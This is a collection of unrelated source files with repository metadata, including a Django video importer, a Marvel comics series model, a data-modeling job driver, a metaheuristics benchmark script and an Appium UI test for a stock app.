de.created = e['created']
if 'seconds' in e:
de.duration = e.get('seconds', -1)
else:
de.duration = e.get('duration', -1)
de.arguments = e.get('arguments', {})
de.task_id = e.get('task_id', "")
return de
class VideoImporter(object):
def __init__(self, video, json, root_dir):
self.video = video
self.json = json
self.root = root_dir
self.region_to_pk = {}
self.frame_to_pk = {}
self.event_to_pk = {}
self.segment_to_pk = {}
self.label_to_pk = {}
self.tube_to_pk = {}
self.name_to_shasum = {'inception':'48b026cf77dfbd5d9841cca3ee550ef0ee5a0751',
'facenet':'9f99caccbc75dcee8cb0a55a0551d7c5cb8a6836',
'vgg':'52723231e796dd06fafd190957c8a3b5a69e009c'}
def import_video(self):
if self.video.name is None or not self.video.name:
self.video.name = self.json['name']
self.video.frames = self.json['frames']
self.video.height = self.json['height']
self.video.width = self.json['width']
self.video.segments = self.json.get('segments', 0)
self.video.stream = self.json.get('stream',False)
self.video.dataset = self.json['dataset']
self.video.description = self.json['description']
self.video.metadata = self.json['metadata']
self.video.length_in_seconds = self.json['length_in_seconds']
self.video.save()
if not self.video.dataset:
old_video_path = [fname for fname in glob.glob("{}/video/*.mp4".format(self.root))][0]
new_video_path = "{}/video/{}.mp4".format(self.root, self.video.pk)
os.rename(old_video_path, new_video_path)
self.import_events()
self.import_segments()
self.bulk_import_frames()
self.convert_regions_files()
self.import_index_entries()
self.import_labels()
self.import_region_labels()
self.import_frame_labels()
self.import_segment_labels()
self.import_tube_labels()
self.import_video_labels()
def import_labels(self):
for l in self.json.get('labels', []):
dl, _ = Label.objects.get_or_create(name=l['name'],set=l.get('set',''))
self.label_to_pk[l['id']] = dl.pk
def import_region_labels(self):
region_labels = []
for rl in self.json.get('region_label_list', []):
drl = RegionLabel()
drl.frame_id = self.frame_to_pk[rl['frame']]
drl.region_id = self.region_to_pk[rl['region']]
drl.video_id = self.video.pk
if 'event' in rl:
drl.event_id = self.event_to_pk[rl['event']]
drl.frame_index = rl['frame_index']
drl.segment_index = rl['segment_index']
drl.label_id = self.label_to_pk[rl['label']]
region_labels.append(drl)
RegionLabel.objects.bulk_create(region_labels,1000)
def import_frame_labels(self):
frame_labels = []
for fl in self.json.get('frame_label_list', []):
dfl = FrameLabel()
dfl.frame_id = self.frame_to_pk[fl['frame']]
dfl.video_id = self.video.pk
if 'event' in fl:
dfl.event_id = self.event_to_pk[fl['event']]
dfl.frame_index = fl['frame_index']
dfl.segment_index = fl['segment_index']
dfl.label_id = self.label_to_pk[fl['label']]
frame_labels.append(dfl)
FrameLabel.objects.bulk_create(frame_labels,1000)
def import_segment_labels(self):
segment_labels = []
for sl in self.json.get('segment_label_list', []):
dsl = SegmentLabel()
dsl.video_id = self.video.pk
if 'event' in sl:
dsl.event_id = self.event_to_pk[sl['event']]
dsl.segment_id = self.segment_to_pk[sl['segment']]
dsl.segment_index = sl['segment_index']
dsl.label_id = self.label_to_pk[sl['label']]
segment_labels.append(dsl)
SegmentLabel.objects.bulk_create(segment_labels,1000)
def import_video_labels(self):
video_labels = []
for vl in self.json.get('video_label_list', []):
dvl = VideoLabel()
dvl.video_id = self.video.pk
if 'event' in vl:
dvl.event_id = self.event_to_pk[vl['event']]
dvl.label_id = self.label_to_pk[vl['label']]
video_labels.append(dvl)
VideoLabel.objects.bulk_create(video_labels,1000)
def import_tube_labels(self):
tube_labels = []
for tl in self.json.get('tube_label_list', []):
dtl = TubeLabel()
dtl.video_id = self.video.pk
if 'event' in tl:
dtl.event_id = self.event_to_pk[tl['event']]
dtl.label_id = self.label_to_pk[tl['label']]
dtl.tube_id = self.tube_to_pk[tl['tube']]
tube_labels.append(dtl)
TubeLabel.objects.bulk_create(tube_labels,1000)
def import_segments(self):
old_ids = []
segments = []
for s in self.json.get('segment_list', []):
old_ids.append(s['id'])
segments.append(self.create_segment(s))
segment_ids = Segment.objects.bulk_create(segments, 1000)
for i, k in enumerate(segment_ids):
self.segment_to_pk[old_ids[i]] = k.id
def create_segment(self,s):
ds = Segment()
ds.video_id = self.video.pk
ds.segment_index = s.get('segment_index', '-1')
ds.start_time = s.get('start_time', 0)
ds.framelist = s.get('framelist', {})
ds.end_time = s.get('end_time', 0)
ds.metadata = s.get('metadata', "")
if s.get('event', None):
ds.event_id = self.event_to_pk[s['event']]
ds.frame_count = s.get('frame_count', 0)
ds.start_index = s.get('start_index', 0)
return ds
def import_events(self):
old_ids = []
children_ids = defaultdict(list)
events = []
for e in self.json.get('event_list', []):
old_ids.append(e['id'])
if 'parent' in e:
children_ids[e['parent']].append(e['id'])
events.append(create_event(e, self.video))
event_ids = TEvent.objects.bulk_create(events, 1000)
for i, k in enumerate(event_ids):
self.event_to_pk[old_ids[i]] = k.id
for old_id in old_ids:
parent_id = self.event_to_pk[old_id]
for child_old_id in children_ids[old_id]:
ce = TEvent.objects.get(pk=self.event_to_pk[child_old_id])
ce.parent_id = parent_id
ce.save()
def convert_regions_files(self):
if os.path.isdir('{}/detections/'.format(self.root)):
source_subdir = 'detections' # temporary for previous version imports
os.mkdir('{}/regions'.format(self.root))
else:
source_subdir = 'regions'
convert_list = []
for k, v in self.region_to_pk.iteritems():
dd = Region.objects.get(pk=v)
original = '{}/{}/{}.jpg'.format(self.root, source_subdir, k)
temp_file = "{}/regions/d_{}.jpg".format(self.root, v)
converted = "{}/regions/{}.jpg".format(self.root, v)
if dd.materialized or os.path.isfile(original):
try:
os.rename(original, temp_file)
convert_list.append((temp_file, converted))
except:
raise ValueError, "could not copy {} to {}".format(original, temp_file)
for temp_file, converted in convert_list:
os.rename(temp_file, converted)
def import_index_entries(self):
# previous_transformed = set()
for i in self.json['index_entries_list']:
di = IndexEntries()
di.video = self.video
di.algorithm = i['algorithm']
# defaults only for backward compatibility
if 'indexer_shasum' in i:
di.indexer_shasum = i['indexer_shasum']
elif i['algorithm'] in self.name_to_shasum:
di.indexer_shasum = self.name_to_shasum[i['algorithm']]
else:
di.indexer_shasum = 'UNKNOWN'
if 'approximator_shasum' in i:
di.approximator_shasum = i['approximator_shasum']
di.count = i['count']
di.contains_detections = i['contains_detections']
di.contains_frames = i['contains_frames']
di.approximate = i['approximate']
di.created = i['created']
di.features_file_name = i['features_file_name']
if 'entries_file_name' in i:
entries = json.load(file('{}/indexes/{}'.format(self.root, i['entries_file_name'])))
else:
entries = i['entries']
di.detection_name = i['detection_name']
di.metadata = i.get('metadata',{})
transformed = []
for entry in entries:
entry['video_primary_key'] = self.video.pk
if 'detection_primary_key' in entry:
entry['detection_primary_key'] = self.region_to_pk[entry['detection_primary_key']]
if 'frame_primary_key' in entry:
entry['frame_primary_key'] = self.frame_to_pk[entry['frame_primary_key']]
transformed.append(entry)
di.entries =transformed
di.save()
def bulk_import_frames(self):
frame_regions = defaultdict(list)
frames = []
frame_index_to_fid = {}
for i, f in enumerate(self.json['frame_list']):
frames.append(self.create_frame(f))
frame_index_to_fid[i] = f['id']
if 'region_list' in f:
for a in f['region_list']:
ra = self.create_region(a)
if ra.region_type == Region.DETECTION:
frame_regions[i].append((ra, a['id']))
else:
frame_regions[i].append((ra, None))
elif 'detection_list' in f or 'annotation_list' in f:
raise NotImplementedError, "Older format no longer supported"
bulk_frames = Frame.objects.bulk_create(frames)
regions = []
regions_index_to_rid = {}
region_index = 0
bulk_regions = []
for i, k in enumerate(bulk_frames):
self.frame_to_pk[frame_index_to_fid[i]] = k.id
for r, rid in frame_regions[i]:
r.frame_id = k.id
regions.append(r)
regions_index_to_rid[region_index] = rid
region_index += 1
if len(regions) == 1000:
bulk_regions.extend(Region.objects.bulk_create(regions))
regions = []
bulk_regions.extend(Region.objects.bulk_create(regions))
regions = []
for i, k in enumerate(bulk_regions):
if regions_index_to_rid[i]:
self.region_to_pk[regions_index_to_rid[i]] = k.id
def create_region(self, a):
da = Region()
da.video_id = self.video.pk
da.x = a['x']
da.y = a['y']
da.h = a['h']
da.w = a['w']
da.vdn_key = a['id']
if 'text' in a:
da.text = a['text']
elif 'metadata_text' in a:
da.text = a['metadata_text']
if 'metadata' in a:
da.metadata = a['metadata']
elif 'metadata_json' in a:
da.metadata = a['metadata_json']
da.materialized = a.get('materialized', False)
da.png = a.get('png', False)
da.region_type = a['region_type']
da.confidence = a['confidence']
da.object_name = a['object_name']
da.full_frame = a['full_frame']
if a.get('event', None):
da.event_id = self.event_to_pk[a['event']]
if 'parent_frame_index' in a:
da.frame_index = a['parent_frame_index']
else:
da.frame_index = a['frame_index']
if 'parent_segment_index' in a:
da.segment_index = a.get('parent_segment_index', -1)
else:
da.segment_index = a.get('segment_index', -1)
return da
def create_frame(self, f):
df = Frame()
df.video_id = self.video.pk
df.name = f['name']
df.frame_index = f['frame_index']
df.subdir = f['subdir']
df.h = f.get('h', 0)
df.w = f.get('w', 0)
df.t = f.get('t', 0)
if f.get('event', None):
df.event_id = self.event_to_pk[f['event']]
df.segment_index = f.get('segment_index', 0)
df.keyframe = f.get('keyframe', False)
return df
def import_tubes(tubes, video_obj):
"""
:param segments:
:param video_obj:
:return:
"""
# TODO: Implement this
raise NotImplementedError
| [
"[email protected]"
] | |
a17d7cd9fdcdc856d383afb6531cce96e9bb9932 | 1ff376da81912600e0f8b3d45ea061d9418a654c | /backend/weeklypulls/apps/series/models.py | 219c094f4f48347bc1312ed8e9e5114862031b13 | [] | no_license | rkuykendall/weeklypulls | 9c3448665b3a18cc0375ad40a60ad71008bb4e89 | e8300a6f28f6ce959130865e8bcf8c365033b2ce | refs/heads/master | 2021-01-17T19:51:43.702126 | 2017-12-18T12:16:28 | 2017-12-18T12:16:28 | 61,999,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py | import os
from django.db import models
from django.contrib.postgres.fields import ArrayField
import marvelous
from weeklypulls.apps.marvel.models import DjangoCache
class Series(models.Model):
series_id = models.IntegerField(unique=True)
read = ArrayField(models.IntegerField(), default=list)
skipped = ArrayField(models.IntegerField(), default=list)
created_at = models.DateTimeField(auto_now_add=True)
class Meta:
verbose_name_plural = "series"
def __str__(self):
try:
return '{} ({})'.format(self.api['title'], self.series_id)
except Exception:
return 'Series {} (api error)'.format(self.series_id)
@property
def api(self):
public_key = os.environ['MAPI_PUBLIC_KEY']
private_key = os.environ['MAPI_PRIVATE_KEY']
cache = DjangoCache()
marvel_api = marvelous.api(public_key, private_key, cache=cache)
series = marvel_api.series(self.series_id)
response = {
'title': series.title,
'comics': [],
'series_id': self.series_id,
}
series_args = {
'format': "comic",
'formatType': "comic",
'noVariants': True,
'limit': 100,
}
for comic in series.comics(series_args):
response['comics'].append({
'id': comic.id,
'title': comic.title,
'read': (comic.id in self.read),
'skipped': (comic.id in self.skipped),
'on_sale': comic.dates.on_sale,
'series_id': comic.series.id,
'images': comic.images,
})
return response
| [
"[email protected]"
] | |
9b7d397ba307c03c0cd50292f30ea2770a2a8816 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02623/s581456736.py | db739a5bab8b529088885d50f94a895ce4eb8e86 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | n, m, k = map(int, input().split())
a = list(map(int, input().split()))
b = list(map(int, input().split()))
a_num = 0
b_num = 0
book_num = 0
passed_k = 0
for i in range(n):
if a[i] + passed_k <= k:
a_num += 1
passed_k += a[i]
else:
break
for i in range(m):
if b[i] + passed_k <= k:
b_num += 1
passed_k += b[i]
else:
break
book_num = a_num + b_num
while a_num > 0:
passed_k -= a[a_num - 1]
a_num -= 1
while b_num < m:
if passed_k + b[b_num] <= k:
passed_k += b[b_num]
b_num += 1
else:
break
book_num = max(book_num, a_num + b_num)
if b_num == m:
break
print(book_num) | [
"[email protected]"
] | |
d0ab779d19449025bfcd4a9b8f4ae12d101f3ed3 | a63d907ad63ba6705420a6fb2788196d1bd3763c | /src/api/dataflow/modeling/job/job_driver.py | fb79d2645b77791a5e854507749137ec274c3ec8 | [
"MIT"
] | permissive | Tencent/bk-base | a38461072811667dc2880a13a5232004fe771a4b | 6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2 | refs/heads/master | 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 | NOASSERTION | 2022-04-02T10:30:56 | 2021-06-29T06:10:01 | Python | UTF-8 | Python | false | false | 10,200 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
import uuid
from dataflow.batch.api.api_helper import BksqlHelper
from dataflow.batch.handlers.processing_batch_info import ProcessingBatchInfoHandler
from dataflow.batch.handlers.processing_job_info import ProcessingJobInfoHandler
from dataflow.modeling.api.api_helper import ModelingApiHelper
from dataflow.modeling.job.jobnavi_register_modeling import ModelingJobNaviRegister
from dataflow.modeling.settings import PARSED_TASK_TYPE, TABLE_TYPE
from dataflow.shared.log import modeling_logger as logger
from dataflow.shared.meta.result_table.result_table_helper import ResultTableHelper
from dataflow.shared.storekit.storekit_helper import StorekitHelper
from dataflow.udf.functions import function_driver
def register_schedule(job_id, schedule_time, created_by, is_restart=False):
# 离线已将相关操作重新封装整理,因此这里可以进行很大的简化
jobnavi_register = ModelingJobNaviRegister(job_id, created_by, is_restart)
return jobnavi_register.register_jobnavi(schedule_time)
def get_output_info(node_info):
# 注意,这里是从前端传递的内容解析出输出字段
# 此时真正的物理表可能还不存在 ,所以这里不能使用ResultTableHelper等相关的请求来获取请求的storage等信息
output_table = None
output_fields = []
output_alias = None
for table_id in node_info["output"]:
output_table = table_id
for field in node_info["output"][table_id]["fields"]:
logger.info(field)
output_field = {
"field": field["field_name"],
"type": field["field_type"],
"description": field["field_alias"],
"origin": [],
}
output_fields.append(output_field)
output_alias = node_info["output"][table_id]["table_alias"]
return {"name": output_table, "fields": output_fields, "alias": output_alias}
def get_input_info(dependence_info):
input_table = None
input_fileds = []
input = {}
for table_id in dependence_info:
input_table = table_id
result_table_fields = ResultTableHelper.get_result_table_fields(input_table)
for filed_info in result_table_fields:
input_table_field = {
"field": filed_info["field_name"],
"type": filed_info["field_type"],
"origin": "",
"description": filed_info["field_alias"],
}
input_fileds.append(input_table_field)
result_table_storage = ResultTableHelper.get_result_table_storage(input_table, "hdfs")["hdfs"]
input["type"] = "hdfs"
input["format"] = result_table_storage["data_type"]
result_table_connect = json.loads(result_table_storage["storage_cluster"]["connection_info"])
input["path"] = "{hdfs_url}/{hdfs_path}".format(
hdfs_url=result_table_connect["hdfs_url"],
hdfs_path=result_table_storage["physical_table_name"],
)
input["table_type"] = TABLE_TYPE.RESULT_TABLE.value
if input["format"] == "iceberg":
iceberg_hdfs_config = StorekitHelper.get_hdfs_conf(input_table)
iceberg_config = {
"physical_table_name": result_table_storage["physical_table_name"],
"hdfs_config": iceberg_hdfs_config,
}
input["iceberg_config"] = iceberg_config
return {"name": input_table, "fields": input_fileds, "info": input}
def get_window_info(input_table, dependence_info, node_info):
# 由于计算真正的数据路径时需要用到当前节点的周期配置(schedule_info)以及依赖表的配置(dependence)
# 所以这里将两者合并在一起成为window_info,每个依赖表都有一个window信息
# 所以在window的信息中有两部分,一部分是每个source都不一样的dependence 以及每个 source内值都一样的schedule_info
# schedule_info表示的是当前节点的调试信息,与父任务无关,这里需要注意理解
window_info = {}
window_info.update(dependence_info[input_table])
window_info.update(node_info["schedule_info"])
return window_info
def update_process_and_job(table_name, processor_logic, submit_args):
batch_processing_info = ProcessingBatchInfoHandler.get_proc_batch_info_by_prefix(table_name)
for processing_info in batch_processing_info:
# 上述两者要更新加Processing
ProcessingBatchInfoHandler.update_proc_batch_info_logic(processing_info.processing_id, processor_logic)
ProcessingBatchInfoHandler.update_proc_batch_info_submit_args(processing_info.processing_id, submit_args)
processing_job_info_list = ProcessingJobInfoHandler.get_proc_job_info_by_prefix(table_name)
for processing_job_info in processing_job_info_list:
job_config = json.loads(processing_job_info.job_config)
job_config["submit_args"] = json.dumps(submit_args)
job_config["processor_logic"] = json.dumps(processor_logic)
ProcessingJobInfoHandler.update_proc_job_info_job_config(processing_job_info.job_id, job_config)
return table_name
def get_sub_query_task(sql, sub_sql, target_entity_name, geog_area_code):
"""
将子查询的相关信息封装为一个临时的task
@param sql: 源mlsql
@param sub_sql: 子查询
@param target_entity_name: mlsql生成实例名称
@param geog_area_code: area code
@return: 临时的任务信息
"""
uuid_str = str(uuid.uuid4())
processing_id = target_entity_name + "_" + uuid_str[0 : uuid_str.find("-")]
# 解析所有用到的udf
udf_data = function_driver.parse_sql(sub_sql, geog_area_code)
logger.info("udf data result:" + json.dumps(udf_data))
udf_name_list = []
for udf in udf_data:
udf_name_list.append(udf["name"])
# 解析用到的所有表
sub_query_table_names = ModelingApiHelper.get_table_names_by_mlsql_parser({"sql": sql})
logger.info("sub query table names:" + json.dumps(sub_query_table_names))
spark_sql_propertiies = {
"spark.input_result_table": sub_query_table_names,
"spark.bk_biz_id": target_entity_name[0 : target_entity_name.find("_")],
"spark.dataflow_udf_function_name": ",".join(udf_name_list),
"spark.result_table_name": processing_id,
}
# 使用sparksql解析子查询的输出
spark_sql_parse_result_list = BksqlHelper.spark_sql(sub_sql, spark_sql_propertiies)
logger.info("spark sql result:" + json.dumps(spark_sql_parse_result_list))
spark_sql_parse_result = spark_sql_parse_result_list[0]
sub_query_fields = spark_sql_parse_result["fields"]
sparksql_query_sql = spark_sql_parse_result["sql"]
tmp_sub_query_fields = []
for field in sub_query_fields:
tmp_sub_query_fields.append(
{
"field": field["field_name"],
"type": field["field_type"],
"description": field["field_alias"],
"index": field["field_index"],
"origins": [""],
}
)
# 解析子查询的输入中用到的所有列
sql_columns_result = ModelingApiHelper.get_columns_by_mlsql_parser({"sql": sub_sql})
logger.info("sql column result:" + json.dumps(sql_columns_result))
processor = {
"args": {
"sql": sparksql_query_sql,
"format_sql": sql_columns_result["sql"], # 含有通配字符的sql
},
"type": "untrained-run",
"name": "tmp_processor",
}
# 解析子查询用到的数据区间(目前暂无应用)
sql_query_source_result = ModelingApiHelper.get_mlsql_query_source_parser({"sql": sub_sql})
logger.info("sql query source result:" + json.dumps(sql_query_source_result))
processor["args"]["time_range"] = sql_query_source_result
# todo:根据所有输入表检查输入列是否存在,去掉不存在的输入列(这里认为不存在的即为经过as或其它重新命名得到的列)这里可以进一步优化
sql_all_columns = sql_columns_result["columns"]
sql_exist_columns = []
for table in sub_query_table_names:
table_fields = ResultTableHelper.get_result_table_fields(table)
for field in table_fields:
sql_exist_columns.append(field["field_name"])
processor["args"]["column"] = list(set(sql_all_columns).intersection(set(sql_exist_columns)))
tmp_subquery_task = {
"table_name": processing_id,
"fields": tmp_sub_query_fields,
"parents": sub_query_table_names,
"processor": processor,
"interpreter": [],
"processing_id": processing_id,
"udfs": udf_data,
"task_type": PARSED_TASK_TYPE.SUB_QUERY.value,
}
return tmp_subquery_task
| [
"[email protected]"
] | |
881bf26ac89b923944c31b113c5a4250cb30de70 | 780c45da6388931381d911499723c5afa8a44036 | /run_test_c30.py | ce1a8a664e0893aa42c5eaf89ed0835150c1a6ad | [
"Apache-2.0"
] | permissive | daitouli/metaheuristics | f9157bd700957072a69c0be03d8d34378533581c | 9d885e4c9e9f39ad22baa9ea5d263d5daa276f88 | refs/heads/master | 2021-02-04T18:40:47.387347 | 2019-09-30T06:51:26 | 2019-09-30T06:51:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | import pandas as pd
from models.multiple_solution.swarm_based.ABC import *
from models.multiple_solution.swarm_based.BMO import *
from models.multiple_solution.swarm_based.BOA import *
from models.multiple_solution.swarm_based.EPO import *
from models.multiple_solution.swarm_based.HHO import *
from models.multiple_solution.swarm_based.NMR import *
from models.multiple_solution.swarm_based.PFA import *
from models.multiple_solution.swarm_based.PSO import *
from models.multiple_solution.swarm_based.SFO import *
from models.multiple_solution.swarm_based.SOA import *
from models.multiple_solution.swarm_based.WOA import *
from utils.FunctionUtil import *
## Setting parameters
root_paras = {
"problem_size": 100,
"domain_range": [-100, 100],
"print_train": True,
"objective_func": C30
}
abc_paras = {
"epoch": 500,
"pop_size": 100,
"couple_bees": [16, 4], # number of bees which provided for good location and other location
"patch_variables": [5.0, 0.985], # patch_variables = patch_variables * patch_factor (0.985)
"sites": [3, 1], # 3 bees (employed bees, onlookers and scouts), 1 good partition
}
bmo_paras = {
"epoch": 500,
"pop_size": 100,
"bm_teams": 10
}
boa_paras = {
"epoch": 500,
"pop_size": 100,
"c": 0.01,
"p": 0.8,
"alpha": [0.1, 0.3]
}
epo_paras = {
"epoch": 500,
"pop_size": 100
}
hho_paras = {
"epoch": 500,
"pop_size": 100
}
nmr_paras = {
"pop_size": 100,
"epoch": 500,
"bp": 0.75, # breeding probability
}
pfa_paras = {
"epoch": 500,
"pop_size": 100
}
pso_paras = {
"epoch": 500,
"pop_size": 100,
"w_minmax": [0.4, 0.9], # [0-1] -> [0.4-0.9] Weight of bird
"c_minmax": [1.2, 1.2] # [(1.2, 1.2), (0.8, 2.0), (1.6, 0.6)] Effecting of local va global
}
isfo_paras = {
"epoch": 500,
"pop_size": 100, # SailFish pop size
"pp": 0.1 # the rate between SailFish and Sardines (N_sf = N_s * pp) = 0.25, 0.2, 0.1
}
soa_paras = {
"epoch": 500,
"pop_size": 100,
}
woa_paras = {
"epoch": 500,
"pop_size": 100
}
## Run model
name_model = {
'BaseABC': BaseABC(root_algo_paras=root_paras, abc_paras=abc_paras),
'BaseBMO': BaseBMO(root_algo_paras=root_paras, bmo_paras=bmo_paras),
"AdaptiveBOA": AdaptiveBOA(root_algo_paras=root_paras, boa_paras=boa_paras),
"BaseEPO": BaseEPO(root_algo_paras=root_paras, epo_paras=epo_paras),
"BaseHHO": BaseHHO(root_algo_paras=root_paras, hho_paras=hho_paras),
"LevyNMR": LevyNMR(root_algo_paras=root_paras, nmr_paras=nmr_paras),
"IPFA": IPFA(root_algo_paras=root_paras, pfa_paras=pfa_paras),
"BasePSO": BasePSO(root_algo_paras=root_paras, pso_paras=pso_paras),
"ImprovedSFO": ImprovedSFO(root_algo_paras=root_paras, isfo_paras=isfo_paras),
"BaseSOA": BaseSOA(root_algo_paras=root_paras, soa_paras=soa_paras),
"BaoWOA": BaoWOA(root_algo_paras=root_paras, woa_paras=woa_paras)
}
### 1st: way
# list_loss = []
# for name, model in name_model.items():
# _, loss = model._train__()
# list_loss.append(loss)
# list_loss = np.asarray(list_loss)
# list_loss = list_loss.T
# np.savetxt("run_test_c30.csv", list_loss, delimiter=",", header=str(name_model.keys()))
### 2nd: way
list_loss = {}
for name, model in name_model.items():
_, loss = model._train__()
list_loss[name] = loss
df = pd.DataFrame(list_loss)
df.to_csv('c30_results.csv') # saving the dataframe
| [
"[email protected]"
] | |
ed530e3765c93ad395a073bdba2ebcf9db8a922e | 2069ec66ace2e8fb5d55502d1c3ce7fd89f3cdcc | /fp2/example/write.py | 2835c40effeaaa01280a975bc1037885b60af898 | [] | no_license | caimingA/ritsumeiPython | 6812a0233456cf3d5346a63d890f4201160593c5 | bb9c39726dd26fe53f7a41f5367bdab60c36a057 | refs/heads/master | 2022-11-16T22:28:50.274374 | 2020-07-13T14:53:51 | 2020-07-13T14:53:51 | 279,294,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | f = open("yuki.txt", mode="w", encoding="utf-8")
f.write("或冬曇りの午後、わたしは中央線の汽車の窓に一列の山脈を眺めてゐた。")
f.write("山脈は勿論まつ白だつた。")
f.write("が、それは雪と言ふよりも山脈の皮膚に近い色をしてゐた。")
| [
"[email protected]"
] | |
91c38c6e741d31665a613aefbe52b741dad9f2d3 | e2f133885cfcea86a3c06bba2f1d4d165e50c823 | /api_test/main.py | eb2d68962d74199d1e2afd00f96adc2b336a3364 | [] | no_license | JR1QQ4/app_test | e0d9dc25ea03060d17dc7f29f30706ec4b8c16ea | 1c2ab9a5601e94a28f9bfe485e615d22511bb79b | refs/heads/main | 2023-05-25T14:55:53.326377 | 2021-06-08T14:33:52 | 2021-06-08T14:33:52 | 349,760,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,417 | py | #!/usr/bin/python
# -*- coding:utf-8 -*-
from time import sleep
from appium import webdriver
from appium.webdriver.common.mobileby import MobileBy
from appium.webdriver.common.touch_action import TouchAction
from appium.webdriver.extensions.android.gsm import GsmCallActions
from appium.webdriver.webdriver import WebDriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Main:
_driver: WebDriver
_appPackage = "com.xueqiu.android"
_appActivity = ".view.WelcomeActivityAlias"
# _appActivity = ".common.MainActivity"
# 搜索框
_search_input = (MobileBy.ID, "com.xueqiu.android:id/tv_search")
_search_text = (MobileBy.ID, "com.xueqiu.android:id/search_input_text")
# 搜索到的内容
_search_result = (MobileBy.XPATH, '//*[@resource-id="com.xueqiu.android:id/name" and @text="$value"]')
_search_result_first = (MobileBy.ID, 'com.xueqiu.android:id/name')
_result_item = (MobileBy.XPATH, '//*[@resource-id="com.xueqiu.android:id/ll_stock_result_view"]'
'//*[@text="$value"]/../..')
_result_item_code = (MobileBy.XPATH, '//*[@text="$code"]')
_result_price = (MobileBy.XPATH, '//*[@resource-id="com.xueqiu.android:id/ll_stock_result_view"]'
'//*[@text="$value"]/../..//*[@resource-id="com.xueqiu.android:id/current_price"]')
_result_price_with_code = (MobileBy.XPATH, '//*[@text="$code"]/../../..'
'//*[@resource-id="com.xueqiu.android:id/current_price"]')
# 取消搜索
_close_search = (MobileBy.ID, 'com.xueqiu.android:id/action_close')
# tab导航
_tab = (MobileBy.XPATH, '//*[@resource-id="android:id/tabs"]//*[@text="$tab"]/..')
def __init__(self, driver: WebDriver = None):
if driver is None:
opts = ["http://127.0.0.1:4723/wd/hub",
{
"platformName": "Android",
"platformVersion": "6.0",
"deviceName": "127.0.0.1:7555",
"automationName": "UiAutomator2",
"appPackage": self._appPackage, # adb shell dumpsys activity top
"appActivity": self._appActivity,
"noRest": True,
"unicodeKeyBoard": True,
"resetKeyBoard": True,
# "avd": "Pixel_23_6", # 启动模拟器
"dontStopAppOnRest": True, # 首次启动 app 时不停止 app(可以调试或者运行的时候提升运行速度)
"skipDeviceInitialization": True, # 跳过安装,权限设置等操作(可以调试或者运行的时候提升运行速度)
# "newCommandTimeout": 300, # 每一条命令执行的间隔时间
# "uuid": "", # 用于
# "autoGrantPermissions": True, # 用于权限管理,设置了这个,就不需要设置 noRest
"chromedriverExecutable": "C:\\webdriver\\chromedriver.exe" # 用于测试 webview 页面
}
]
self._driver = webdriver.Remote(*opts)
else:
self._driver.start_activity(self._appPackage, self._appActivity)
self._driver.implicitly_wait(10)
def find(self, locator):
WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(locator))
return self._driver.find_element(*locator)
def click(self, locator):
ele = WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(locator))
ele.click()
def text(self, locator, value=""):
WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(locator))
if value != "":
self._driver.find_element(*locator).send_keys(value)
else:
return self._driver.find_element(*locator).text
def search(self, value="阿里巴巴"):
self.click(self._search_input)
self.text(self._search_text, value)
def search_and_get_price(self, value="阿里巴巴"):
self.click(self._search_input)
self.text(self._search_text, value)
self.click((self._search_result[0], self._search_result[1].replace("$value", "阿里巴巴")))
return float(self.text((self._result_price[0], self._result_price[1].replace("$value", "阿里巴巴"))))
def search_and_show_attribute(self):
ele = self.find(self._search_input)
search_enabled = ele.is_enabled()
print(ele.text) # 搜索股票/组合/用户/讨论
print(ele.location) # {'x': 219, 'y': 60}
print(ele.size) # {'height': 36, 'width': 281}
if search_enabled:
ele.click()
self.text(self._search_text, "alibaba")
ali_ele = self.find((self._search_result[0], self._search_result[1].replace("$value", "阿里巴巴")))
# ali_ele.is_displayed()
print(ali_ele.get_attribute("displayed")) # true
def move_to(self, cur=None, target=None):
sleep(3)
action = TouchAction(self._driver)
# action.press(x=cur["x"], y=cur["y"]).wait(200).move_to(x=target["x"], y=target["y"]).release().perform()
print(self._driver.get_window_rect())
action.press(x=360, y=1000).wait(200).move_to(x=360, y=280).release().perform()
def scroll_and_search_with_android_selector(self):
loc = (MobileBy.ANDROID_UIAUTOMATOR, 'new UiSelector().text("关注")')
WebDriverWait(self._driver, 10).until(EC.visibility_of_element_located(loc))
